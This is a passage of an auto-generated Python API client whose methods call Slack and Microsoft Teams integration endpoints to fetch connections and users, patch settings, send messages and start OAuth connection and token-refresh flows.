asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_teams_connection_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(TeamsConnection, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_teams_connection" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_teams_connection`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/teams/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TeamsConnection', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_teams_users(self, id, **kwargs): # noqa: E501
"""get_teams_users # noqa: E501
### Required permissions * User account permission: `tasks:manage` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_teams_users(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[TeamsRecipient]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_teams_users_with_http_info(id, **kwargs) # noqa: E501
def get_teams_users_with_http_info(self, id, **kwargs): # noqa: E501
"""get_teams_users # noqa: E501
### Required permissions * User account permission: `tasks:manage` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_teams_users_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[TeamsRecipient], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_teams_users" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_teams_users`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/teams/{id}/users', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TeamsRecipient]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_slack_connection(self, id, slack_connection_partial_update, **kwargs): # noqa: E501
"""patch_slack_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_slack_connection(id, slack_connection_partial_update, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param SlackConnectionPartialUpdate slack_connection_partial_update: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SlackConnection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_slack_connection_with_http_info(id, slack_connection_partial_update, **kwargs) # noqa: E501
def patch_slack_connection_with_http_info(self, id, slack_connection_partial_update, **kwargs): # noqa: E501
"""patch_slack_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_slack_connection_with_http_info(id, slack_connection_partial_update, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param SlackConnectionPartialUpdate slack_connection_partial_update: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SlackConnection, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'slack_connection_partial_update'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_slack_connection" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `patch_slack_connection`") # noqa: E501
# verify the required parameter 'slack_connection_partial_update' is set
if self.api_client.client_side_validation and ('slack_connection_partial_update' not in local_var_params or # noqa: E501
local_var_params['slack_connection_partial_update'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `slack_connection_partial_update` when calling `patch_slack_connection`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'slack_connection_partial_update' in local_var_params:
body_params = local_var_params['slack_connection_partial_update']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/slack/{id}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SlackConnection', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_teams_connection(self, id, teams_connection_partial_update, **kwargs): # noqa: E501
"""patch_teams_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_teams_connection(id, teams_connection_partial_update, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param TeamsConnectionPartialUpdate teams_connection_partial_update: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: TeamsConnection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_teams_connection_with_http_info(id, teams_connection_partial_update, **kwargs) # noqa: E501
def patch_teams_connection_with_http_info(self, id, teams_connection_partial_update, **kwargs): # noqa: E501
"""patch_teams_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_teams_connection_with_http_info(id, teams_connection_partial_update, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param TeamsConnectionPartialUpdate teams_connection_partial_update: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(TeamsConnection, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'teams_connection_partial_update'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_teams_connection" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `patch_teams_connection`") # noqa: E501
# verify the required parameter 'teams_connection_partial_update' is set
if self.api_client.client_side_validation and ('teams_connection_partial_update' not in local_var_params or # noqa: E501
local_var_params['teams_connection_partial_update'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `teams_connection_partial_update` when calling `patch_teams_connection`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'teams_connection_partial_update' in local_var_params:
body_params = local_var_params['teams_connection_partial_update']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/teams/{id}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TeamsConnection', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def send_slack_message(self, id, slack_message, **kwargs): # noqa: E501
"""send_slack_message # noqa: E501
### Required permissions * User account permission: `tasks:manage` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.send_slack_message(id, slack_message, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param SlackMessage slack_message: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.send_slack_message_with_http_info(id, slack_message, **kwargs) # noqa: E501
def send_slack_message_with_http_info(self, id, slack_message, **kwargs): # noqa: E501
"""send_slack_message # noqa: E501
### Required permissions * User account permission: `tasks:manage` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.send_slack_message_with_http_info(id, slack_message, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param SlackMessage slack_message: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'slack_message'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method send_slack_message" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `send_slack_message`") # noqa: E501
# verify the required parameter 'slack_message' is set
if self.api_client.client_side_validation and ('slack_message' not in local_var_params or # noqa: E501
local_var_params['slack_message'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `slack_message` when calling `send_slack_message`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'slack_message' in local_var_params:
body_params = local_var_params['slack_message']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/slack/{id}/message', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def send_teams_message(self, id, teams_message, **kwargs): # noqa: E501
"""send_teams_message # noqa: E501
### Required permissions * User account permission: `tasks:manage` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.send_teams_message(id, teams_message, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param TeamsMessage teams_message: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.send_teams_message_with_http_info(id, teams_message, **kwargs) # noqa: E501
def send_teams_message_with_http_info(self, id, teams_message, **kwargs): # noqa: E501
"""send_teams_message # noqa: E501
### Required permissions * User account permission: `tasks:manage` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.send_teams_message_with_http_info(id, teams_message, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param TeamsMessage teams_message: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'teams_message'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method send_teams_message" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `send_teams_message`") # noqa: E501
# verify the required parameter 'teams_message' is set
if self.api_client.client_side_validation and ('teams_message' not in local_var_params or # noqa: E501
local_var_params['teams_message'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `teams_message` when calling `send_teams_message`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'teams_message' in local_var_params:
body_params = local_var_params['teams_message']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/teams/{id}/send-message', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def start_slack_connection_flow(self, **kwargs): # noqa: E501
"""start_slack_connection_flow # noqa: E501
### Required permissions * User account permission: `system:admin-access` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_slack_connection_flow(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str ordering: Which field to use when ordering the results.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.start_slack_connection_flow_with_http_info(**kwargs) # noqa: E501
def start_slack_connection_flow_with_http_info(self, **kwargs): # noqa: E501
"""start_slack_connection_flow # noqa: E501
### Required permissions * User account permission: `system:admin-access` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_slack_connection_flow_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str ordering: Which field to use when ordering the results.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['ordering', 'limit', 'offset'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method start_slack_connection_flow" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ordering' in local_var_params and local_var_params['ordering'] is not None: # noqa: E501
query_params.append(('ordering', local_var_params['ordering'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/slack/connect', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def start_slack_connection_token_refresh_flow(self, id, **kwargs): # noqa: E501
"""start_slack_connection_token_refresh_flow # noqa: E501
### Required permissions * User account permission: `system:admin-access` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_slack_connection_token_refresh_flow(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.start_slack_connection_token_refresh_flow_with_http_info(id, **kwargs) # noqa: E501
def start_slack_connection_token_refresh_flow_with_http_info(self, id, **kwargs): # noqa: E501
"""start_slack_connection_token_refresh_flow # noqa: E501
### Required permissions * User account permission: `system:admin-access` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_slack_connection_token_refresh_flow_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method start_slack_connection_token_refresh_flow" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `start_slack_connection_token_refresh_flow`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/slack/{id}/refresh-token', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def start_teams_connection_flow(self, **kwargs): # noqa: E501
"""start_teams_connection_flow # noqa: E501
### Required permissions * User account permission: `system:admin-access` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_teams_connection_flow(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str ordering: Which field to use when ordering the results.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param str team:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.start_teams_connection_flow_with_http_info(**kwargs) # noqa: E501
def start_teams_connection_flow_with_http_info(self, **kwargs): # noqa: E501
"""start_teams_connection_flow # noqa: E501
### Required permissions * User account permission: `system:admin-access` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_teams_connection_flow_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str ordering: Which field to use when ordering the results.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param str team:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['ordering', 'limit', 'offset', 'team'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method start_teams_connection_flow" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ordering' in local_var_params and local_var_params['ordering'] is not None: # noqa: E501
query_params.append(('ordering', local_var_params['ordering'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'team' in local_var_params and local_var_params['team'] is not None: # noqa: E501
query_params.append(('team', local_var_params['team'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/teams/connect', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def start_teams_connection_token_refresh_flow(self, id, **kwargs): # noqa: E501
"""start_teams_connection_token_refresh_flow # noqa: E501
### Required permissions * User account permission: `system:admin-access` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_teams_connection_token_refresh_flow(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param str team:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.start_teams_connection_token_refresh_flow_with_http_info(id, **kwargs) # noqa: E501
def start_teams_connection_token_refresh_flow_with_http_info(self, id, **kwargs): # noqa: E501
"""start_teams_connection_token_refresh_flow # noqa: E501
### Required permissions * User account permission: `system:admin-access` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_teams_connection_token_refresh_flow_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param str team:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'team'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method start_teams_connection_token_refresh_flow" % key
)
local_var_params[key] = val
